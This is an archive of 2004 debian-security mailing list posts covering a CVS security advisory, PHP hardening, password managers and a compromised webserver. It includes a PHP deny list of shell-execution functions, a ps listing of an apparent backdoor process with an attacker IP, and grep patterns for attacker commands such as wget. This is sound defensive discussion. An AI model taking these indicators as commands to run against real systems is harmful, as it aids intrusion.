[SECURITY] [DSA 519-1] New CVS packages fix several potential security problems
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 519-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 15th, 2004 http://www.debian.org/security/faq - -- Package: cvs Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CAN-2004-0416 CAN-2004-0417 CAN-2004-0418 Sebastian Krahmer and Stefan Esser discovered several vulnerabilities in the CVS server, which serves the popular Concurrent Versions System. The Common Vulnerability and Exposures project identifies the following problems: CAN-2004-0416: double-free() in error_prog_name CAN-2004-0417: argument integer overflow CAN-2004-0418: out of bound writes in serve_notify() For the stable distribution (woody) this problem has been fixed in version 1.11.1p1debian-9woody7. For the unstable distribution (sid) this problem has been fixed in version 1.12.9-1. We recommend that you upgrade your cvs package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7.dsc Size/MD5 checksum: 693 808c55e071608254b399c5cf8288c478 http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7.diff.gz Size/MD5 checksum:55929 5c87146893651805658b497c8d2164f3 http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian.orig.tar.gz Size/MD5 checksum: 2621658 500965ab9702b31605f8c58aa21a6205 Alpha architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_alpha.deb Size/MD5 checksum: 1178992 d411cdd545809660443ff35d49c6e105 ARM architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_arm.deb Size/MD5 checksum: 1106154 5839fcf6673e32d51fc8814591cb49d1 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_i386.deb Size/MD5 checksum: 1086800 1283329c4e9337eb1308945ab77738a7 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_ia64.deb Size/MD5 checksum: 1272232 e71070f4b415c03b996fbc5e14006094 HP Precision architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_hppa.deb Size/MD5 checksum: 1148086 8e70b23bba46da919774913f5b3d3b83 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_m68k.deb Size/MD5 checksum: 1066546 e7f59327f9afdeeec311178839c6997e Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_mips.deb Size/MD5 checksum: 1130478 08811baa91dabf7619b2ca9bb3c84fe6 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_mipsel.deb Size/MD5 checksum: 1131936 6f51edb9c8f078f8c37ffeb87db686e7 PowerPC architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_powerpc.deb Size/MD5 checksum: 1116890 c50418a92b897b0bd698a389a3dd5ba5 IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_s390.deb Size/MD5 checksum: 1097614 1e967b9a0ea2f2feaf4f83b4fb082750 Sun Sparc architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_sparc.deb Size/MD5 checksum: 1107928 49e348f931f71a861140995edb0fcd30 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAzrK8W5ql+IAeqTIRAr8XAJ94PsjJeiEmk+30TWRQqTu20hTyIACeMmZp xDgNabtz7WdT+TlC3In2tZk= =iKaZ -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Tue, 15 Jun 2004, Ross Tsolakidis wrote: I'd appreciate some help on how to stop this from happening. Run something like aide so you can detect when it goes wrong (though there are some caveats it does not sound like they will hit you) and run a netflow-collector next to it, if you can. That way you can easily discover where it is coming from and why. Doesn't the logging on your loghost show anything? Jan -- /~\ The ASCII / Jan Meijer \ / Ribbon Campaign-- --SURFnet bv X Against HTML/ http://www.surfnet.nl/organisatie/jm/ / \ Email http://cert-nl.surfnet.nl/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Crash Bug????
Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Thanks in advance, Rudy -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Crash Bug????
On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote: Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Does PHP allow executing arbitary binaries? If the user can install CGI-BIN scripts then that's a good way of running a kernel security attack (or other local or back-end network attack). -- http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux packages http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark http://www.coker.com.au/postal/Postal SMTP/POP benchmark http://www.coker.com.au/~russell/ My home page -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Crash Bug????
Ignore my message. I didn't read the url give aboven carefully enough. It mentions what I asked. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Crash Bug????
On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote: Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.eu.org/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when you have better things to do than to fix a system. pgptxOZFGlsNP.pgp Description: PGP signature
Re: password managers
On Tue, Jun 15, 2004 at 12:46:13AM +0200, Stephan Dietl wrote: Hello! andrew lattis [EMAIL PROTECTED] schrieb: what does everyone else use to keep track of all there passwords? Following an article of Martin Joey Schulze in a german magazine i send a mail with the password encryted for myself to me and use it via mutt. I used gringotts, that someone mentioned. Some of the applications I run use kwallet, that seems similar to what Russell Cooker described for OS X. But I use vim (+gpg, that is). Which is a solution similar to the one Stephan talks about, but without having to mail yourself every password. I took it from somewhere I can't remember so credit goes to whoever wrote it. What this does is: - If the file extension is .gpg or .asc, call gpg --decrypt to get the real contents - Edit the file - Call gpg --encrypt before writing to disk. So you keep everything encrypted with your GPG key. From my .vimrc: - cut augroup encrypted au! First make sure nothing is written to ~/.viminfo while editing an encrypted file. autocmd BufReadPre,FileReadPre *.gpg,*.asc set viminfo= We don't want a swap file, as it writes unencrypted data to disk. autocmd BufReadPre,FileReadPre *.gpg,*.asc set noswapfile Switch to binary mode to read the encrypted file. autocmd BufReadPre,FileReadPre *.gpg set bin autocmd BufReadPre,FileReadPre *.gpg,*.asc let ch_save = ch|set ch=2 autocmd BufReadPost,FileReadPost*.gpg,*.asc \ '[,']!sh -c 'gpg --decrypt 2 /dev/null' Switch to normal mode for editing autocmd BufReadPost,FileReadPost*.gpg set nobin autocmd BufReadPost,FileReadPost*.gpg,*.asc let ch = ch_save|unlet ch_save autocmd BufReadPost,FileReadPost*.gpg,*.asc \ execute :doautocmd BufReadPost . expand(%:r) Convert all text to encrypted text before writing autocmd BufWritePre,FileWritePre*.gpg \ '[,']!sh -c 'gpg --default-recipient-self -e 2/dev/null' autocmd BufWritePre,FileWritePre*.gpg set bin autocmd BufWritePre,FileWritePre*.asc \ '[,']!sh -c 'gpg --default-recipient-self -e -a 2/dev/null' Undo the encryption so we are back in the normal text, directly after the file has been written. autocmd BufWritePost,FileWritePost *.gpg,*.asc u autocmd BufWritePost,FileWritePost *.gpg set nobin augroup END --- cut -- Alberto Gonzalez Iniesta | BOFH excuse #399: agi@(agi.as|debian.org)| We are a 100% Microsoft Shop. Encrypted mail preferred | Key fingerprint = 9782 04E7 2B75 405C F5E9 0C81 C514 AF8E 4BA4 01C3 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: may CAN-2004-041[678] affect on woody?
Hi, Fri, 11 Jun 2004 20:50:12 +0900, [EMAIL PROTECTED] may CAN-2004-041[678] affect on woody? May CAN-2004-0416, CAN-2004-0417 and CAN-2004-0418 not affect on Debian woody? Or, may anyone works for merging this fix? The answer is It affects woody and now DSA 519-1 was shipped. -- Regards, Hideki Yamanemailto:henrich @ samba.gr.jp/iijmio-mail.jp -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? -- Rudy Gevaert[EMAIL PROTECTED] Web pagehttp://www.webworm.org Schamper sysadmin http://www.schamper.ugent.be GNU/Linux user and Savannah hacker http://savannah.gnu.org On-line, adj.: The idea that a human being should always be accessible to a computer. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote: On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? http://php.net/security, a better solution to the above mentioned problem is 'safe_mode', which is intended to block all dangerous file access, executing, etc. --Jeroen -- Jeroen van Wolffelaar [EMAIL PROTECTED] (also for Jabber MSN; ICQ: 33944357) http://Jeroen.A-Eskwadraat.nl -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 11:20:35AM +0200, Jeroen van Wolffelaar wrote: On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote: On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? http://php.net/security, a better solution to the above mentioned problem is 'safe_mode', which is intended to block all dangerous file access, executing, etc. See also: http://www.pookey.co.uk/php-security.xml http://www.pookey.co.uk/php-suphp.xml Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.eu.org/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when you have better things to do than to fix a system. pgpNO1LkvUfna.pgp Description: PGP signature
Re: securing PHP (was: Kernel Crash Bug????)
Hi, Tue, 15 Jun 2004 10:35:33 +0200, Rudy Gevaert securing PHP (was: Kernel Crash Bug) Can somebody point me to some documentation about securing PHP? Not documentation but patch for php, Hardened-PHP. http://www.hardened-php.net/ -- Regards, Hideki Yamanemailto:henrich @ iijmio-mail.jp -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: password managers
al what does everyone else use to keep track of all there passwords? I've used 'tkpasman' for years ... nice! http://www.xs4all.nl/~wbsoft/linux/tkpasman.html -- Prof Kenneth H Jacker [EMAIL PROTECTED] Computer Science Dept www.cs.appstate.edu/~khj Appalachian State Univ Boone, NC 28608 USA -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: password managers
Try kedpm, its a debian package, and has console as well as GUI support and uses the FPM data, really nice. micah On Tue, 15 Jun 2004, Kenneth Jacker wrote: al what does everyone else use to keep track of all there passwords? I've used 'tkpasman' for years ... nice! http://www.xs4all.nl/~wbsoft/linux/tkpasman.html -- Prof Kenneth H Jacker [EMAIL PROTECTED] Computer Science Dept www.cs.appstate.edu/~khj Appalachian State Univ Boone, NC 28608 USA -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: password managers
micah Try kedpm, its a debian package, and has console as well as micah GUI support and uses the FPM data, really nice. Thanks for the suggestion! Though I found a web site for 'kedpm': http://kedpm.sourceforge.net/ the following return no Debian packages: http://packages.debian.org/kedpm nor did sourceforge (only tar files): https://sourceforge.net/project/showfiles.php?group_id=87161 Where are the Debian packages? ;-) Also, a question: one thing I like about 'tkpasman' is the feature which allows two X11 pastes (e.g., username password) immediately after selecting a passworded site. Very convenient ... How is the info transfered out of 'kedpm'? -Kenneth -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Spam fights
Here is a list of junk subject patterns in case someone is interested. Alain junkMailPatterns.gz Description: Binary data
Re: Spam fights
Can the mailing list software add a X-Subscribed : yes/no in the mail headers ? Then people decide to filter it out or not. Alain -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Wipe, install, set up chkrootkit and run it often. I've already done that. There was no rootkit. How does phpnuke compromise apache if apache is set up correctly? I believe it's some of the modules available and running php with 'safe mode off'. I need to find the vulnerable code on this box. And I have no idea where to begin. I've tried running virus scans, nothing is infected. -- Ross -Original Message- From: s. keeling [mailto:[EMAIL PROTECTED] Sent: Tuesday, 15 June 2004 2:06 PM To: [EMAIL PROTECTED] Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver. Incoming from Ross Tsolakidis: One of our webservers seems to get compromised on a daily basis. When I do a ps ax I see these processes all the time. 18687 ?S 0:00 shell 18701 ?Z 0:00 [sh defunct] 18704 ?T 0:00 ./3 200.177.162.185 1524 I vaguely remember that 3 in /tmp is slapper. Wipe, install, set up chkrootkit and run it often. How does phpnuke compromise apache if apache is set up correctly? -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] DISCLAIMER: This e-mail and any files transmitted with it may be privileged and confidential, and are intended only for the use of the intended recipient. If you are not the intended recipient or responsible for delivering this e-mail to the intended recipient, any use, dissemination, forwarding, printing or copying of this e-mail and any attachments is strictly prohibited. If you have received this e-mail in error, please REPLY TO the SENDER to advise the error AND then DELETE the e-mail from your system. Any views expressed in this e-mail and any files transmitted with it are those of the individual sender, except where the sender specifically states them to be the views of our organisation. Our organisation does not represent or warrant that the attached files are free from computer viruses or other defects. The user assumes all responsibility for any loss or damage resulting directly or indirectly from the use of the attached files. In any event, the liability to our organisation is limited to either the resupply of the attached files or the cost of having the attached files resupplied.
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
Wipe, install, set up chkrootkit and run it often.
I've already done that. There was no rootkit.
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.net or Google
easily.
[snip]
I need to find the vulnerable code on this box. And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.
[snip]
The files you found within /tmp - Grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
uname -a, ls -l, wget, remembering you may need to substitue a
space for %20:
# grep -i 'uname%20-a' {access,error}.log
# grep -i 'wget' {access,error}.log
How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?
HTH.
David.
--
.''`. David Ramsden [EMAIL PROTECTED]
: :' :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
`- Debian - when you have better things to do than to fix a system.
pgpmDaMQVSeGi.pgp
Description: PGP signature
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Look at installing mod_security, http://modsecurity.org Install some rules for it to harden your webserver, see if anything is flagged in the security log. Ross Tsolakidis wrote: Wipe, install, set up chkrootkit and run it often. I've already done that. There was no rootkit. How does phpnuke compromise apache if apache is set up correctly? I believe it's some of the modules available and running php with 'safe mode off'. I need to find the vulnerable code on this box. And I have no idea where to begin. I've tried running virus scans, nothing is infected. -- Ross -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
hi ya On Wed, 16 Jun 2004, TiM wrote: Look at installing mod_security, http://modsecurity.org Install some rules for it to harden your webserver, see if anything is flagged in the security log. other web server testing tools http://www.linux-sec.net/Web/#Testing c ya alvin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: password managers
On Tue, 15 Jun 2004 18:46, Alberto Gonzalez Iniesta [EMAIL PROTECTED] wrote: Some of the applications I run use kwallet, that seems similar to what Russell Cooker described for OS X. No. kwallet can be ptraced, this allows a hostile program to get access to all it's data with ease. Of course in OS/X I expect that you could fool the password manager somehow to get access. But at least they stop ptrace. Also kwallet seems to have no features for restricting access to data. -- http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux packages http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark http://www.coker.com.au/postal/Postal SMTP/POP benchmark http://www.coker.com.au/~russell/ My home page -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Incoming from Ross Tsolakidis: One of our webservers seems to get compromised on a daily basis. When I do a ps ax I see these processes all the time. 18687 ?S 0:00 shell 18701 ?Z 0:00 [sh defunct] 18704 ?T 0:00 ./3 200.177.162.185 1524 I vaguely remember that 3 in /tmp is slapper. Wipe, install, set up chkrootkit and run it often. How does phpnuke compromise apache if apache is set up correctly? -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - -
Re: Kernel Crash Bug????
Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Thanks in advance, Rudy
Re: Kernel Crash Bug????
On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote: Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Does PHP allow executing arbitary binaries? If the user can install CGI-BIN scripts then that's a good way of running a kernel security attack (or other local or back-end network attack). -- http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux packages http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark http://www.coker.com.au/postal/Postal SMTP/POP benchmark http://www.coker.com.au/~russell/ My home page
Re: Kernel Crash Bug????
Ignore my message. I didn't read the url give aboven carefully enough. It mentions what I asked.
Re: Kernel Crash Bug????
On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote: Would it be possible to run that program trough e.g. perl/php/... ? A use could ftp the executable and write a php script that execute it. Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.eu.org/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when you have better things to do than to fix a system. pgpIAtiLt2TfI.pgp Description: PGP signature
Re: password managers
On Tue, Jun 15, 2004 at 12:46:13AM +0200, Stephan Dietl wrote: Hello! andrew lattis [EMAIL PROTECTED] schrieb: what does everyone else use to keep track of all there passwords? Following an article of Martin Joey Schulze in a german magazine i send a mail with the password encryted for myself to me and use it via mutt. I used gringotts, that someone mentioned. Some of the applications I run use kwallet, that seems similar to what Russell Cooker described for OS X. But I use vim (+gpg, that is). Which is a solution similar to the one Stephan talks about, but without having to mail yourself every password. I took it from somewhere I can't remember so credit goes to whoever wrote it. What this does is: - If the file extension is .gpg or .asc, call gpg --decrypt to get the real contents - Edit the file - Call gpg --encrypt before writing to disk. So you keep everything encrypted with your GPG key. From my .vimrc: - cut augroup encrypted au! First make sure nothing is written to ~/.viminfo while editing an encrypted file. autocmd BufReadPre,FileReadPre *.gpg,*.asc set viminfo= We don't want a swap file, as it writes unencrypted data to disk. autocmd BufReadPre,FileReadPre *.gpg,*.asc set noswapfile Switch to binary mode to read the encrypted file. autocmd BufReadPre,FileReadPre *.gpg set bin autocmd BufReadPre,FileReadPre *.gpg,*.asc let ch_save = ch|set ch=2 autocmd BufReadPost,FileReadPost*.gpg,*.asc \ '[,']!sh -c 'gpg --decrypt 2 /dev/null' Switch to normal mode for editing autocmd BufReadPost,FileReadPost*.gpg set nobin autocmd BufReadPost,FileReadPost*.gpg,*.asc let ch = ch_save|unlet ch_save autocmd BufReadPost,FileReadPost*.gpg,*.asc \ execute :doautocmd BufReadPost . expand(%:r) Convert all text to encrypted text before writing autocmd BufWritePre,FileWritePre*.gpg \ '[,']!sh -c 'gpg --default-recipient-self -e 2/dev/null' autocmd BufWritePre,FileWritePre*.gpg set bin autocmd BufWritePre,FileWritePre*.asc \ '[,']!sh -c 'gpg --default-recipient-self -e -a 2/dev/null' Undo the encryption so we are back in the normal text, directly after the file has been written. autocmd BufWritePost,FileWritePost *.gpg,*.asc u autocmd BufWritePost,FileWritePost *.gpg set nobin augroup END --- cut -- Alberto Gonzalez Iniesta | BOFH excuse #399: agi@(agi.as|debian.org)| We are a 100% Microsoft Shop. Encrypted mail preferred | Key fingerprint = 9782 04E7 2B75 405C F5E9 0C81 C514 AF8E 4BA4 01C3
Re: may CAN-2004-041[678] affect on woody?
Hi, Fri, 11 Jun 2004 20:50:12 +0900, [EMAIL PROTECTED] may CAN-2004-041[678] affect on woody? May CAN-2004-0416, CAN-2004-0417 and CAN-2004-0418 not affect on Debian woody? Or, may anyone works for merging this fix? The answer is It affects woody and now DSA 519-1 was shipped. -- Regards, Hideki Yamanemailto:henrich @ samba.gr.jp/iijmio-mail.jp
securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? -- Rudy Gevaert[EMAIL PROTECTED] Web pagehttp://www.webworm.org Schamper sysadmin http://www.schamper.ugent.be GNU/Linux user and Savannah hacker http://savannah.gnu.org On-line, adj.: The idea that a human being should always be accessible to a computer.
Re: securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote: On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? http://php.net/security, a better solution to the above mentioned problem is 'safe_mode', which is intended to block all dangerous file access, executing, etc. --Jeroen -- Jeroen van Wolffelaar [EMAIL PROTECTED] (also for Jabber MSN; ICQ: 33944357) http://Jeroen.A-Eskwadraat.nl
Re: securing PHP (was: Kernel Crash Bug????)
On Tue, Jun 15, 2004 at 11:20:35AM +0200, Jeroen van Wolffelaar wrote: On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote: On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote: On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote: Does PHP allow executing arbitary binaries? [snip] Yes, unless in your php.ini you have something along the lines of: disable_functions = system,passthru,shell_exec,popen,proc_open Can somebody point me to some documentation about securing PHP? http://php.net/security, a better solution to the above mentioned problem is 'safe_mode', which is intended to block all dangerous file access, executing, etc. See also: http://www.pookey.co.uk/php-security.xml http://www.pookey.co.uk/php-suphp.xml Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.eu.org/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when you have better things to do than to fix a system. pgpxc5T6Gr2YQ.pgp Description: PGP signature
Re: securing PHP (was: Kernel Crash Bug????)
Hi, Tue, 15 Jun 2004 10:35:33 +0200, Rudy Gevaert securing PHP (was: Kernel Crash Bug) Can somebody point me to some documentation about securing PHP? Not documentation but patch for php, Hardened-PHP. http://www.hardened-php.net/ -- Regards, Hideki Yamanemailto:henrich @ iijmio-mail.jp
Re: password managers
al what does everyone else use to keep track of all there passwords? I've used 'tkpasman' for years ... nice! http://www.xs4all.nl/~wbsoft/linux/tkpasman.html -- Prof Kenneth H Jacker [EMAIL PROTECTED] Computer Science Dept www.cs.appstate.edu/~khj Appalachian State Univ Boone, NC 28608 USA
Re: password managers
Try kedpm, its a debian package, and has console as well as GUI support and uses the FPM data, really nice. micah On Tue, 15 Jun 2004, Kenneth Jacker wrote: al what does everyone else use to keep track of all there passwords? I've used 'tkpasman' for years ... nice! http://www.xs4all.nl/~wbsoft/linux/tkpasman.html -- Prof Kenneth H Jacker [EMAIL PROTECTED] Computer Science Dept www.cs.appstate.edu/~khj Appalachian State Univ Boone, NC 28608 USA -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: password managers
micah Try kedpm, its a debian package, and has console as well as micah GUI support and uses the FPM data, really nice. Thanks for the suggestion! Though I found a web site for 'kedpm': http://kedpm.sourceforge.net/ the following return no Debian packages: http://packages.debian.org/kedpm nor did sourceforge (only tar files): https://sourceforge.net/project/showfiles.php?group_id=87161 Where are the Debian packages? ;-) Also, a question: one thing I like about 'tkpasman' is the feature which allows two X11 pastes (e.g., username password) immediately after selecting a passworded site. Very convenient ... How is the info transfered out of 'kedpm'? -Kenneth
Re: [OT] Spam fights
Here is a list of junk subject patterns in case someone is interested. Alain junkMailPatterns.gz Description: Binary data
Re: Spam fights
Can the mailing list software add a X-Subscribed : yes/no in the mail headers ? Then people decide to filter it out or not. Alain
RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Wipe, install, set up chkrootkit and run it often. I've already done that. There was no rootkit. How does phpnuke compromise apache if apache is set up correctly? I believe it's some of the modules available and running php with 'safe mode off'. I need to find the vulnerable code on this box. And I have no idea where to begin. I've tried running virus scans, nothing is infected. -- Ross -Original Message- From: s. keeling [mailto:[EMAIL PROTECTED] Sent: Tuesday, 15 June 2004 2:06 PM To: debian-security@lists.debian.org Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver. Incoming from Ross Tsolakidis: One of our webservers seems to get compromised on a daily basis. When I do a ps ax I see these processes all the time. 18687 ?S 0:00 shell 18701 ?Z 0:00 [sh defunct] 18704 ?T 0:00 ./3 200.177.162.185 1524 I vaguely remember that 3 in /tmp is slapper. Wipe, install, set up chkrootkit and run it often. How does phpnuke compromise apache if apache is set up correctly? -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] DISCLAIMER: This e-mail and any files transmitted with it may be privileged and confidential, and are intended only for the use of the intended recipient. If you are not the intended recipient or responsible for delivering this e-mail to the intended recipient, any use, dissemination, forwarding, printing or copying of this e-mail and any attachments is strictly prohibited. If you have received this e-mail in error, please REPLY TO the SENDER to advise the error AND then DELETE the e-mail from your system. Any views expressed in this e-mail and any files transmitted with it are those of the individual sender, except where the sender specifically states them to be the views of our organisation. Our organisation does not represent or warrant that the attached files are free from computer viruses or other defects. The user assumes all responsibility for any loss or damage resulting directly or indirectly from the use of the attached files. In any event, the liability to our organisation is limited to either the resupply of the attached files or the cost of having the attached files resupplied.
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
Wipe, install, set up chkrootkit and run it often.
I've already done that. There was no rootkit.
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
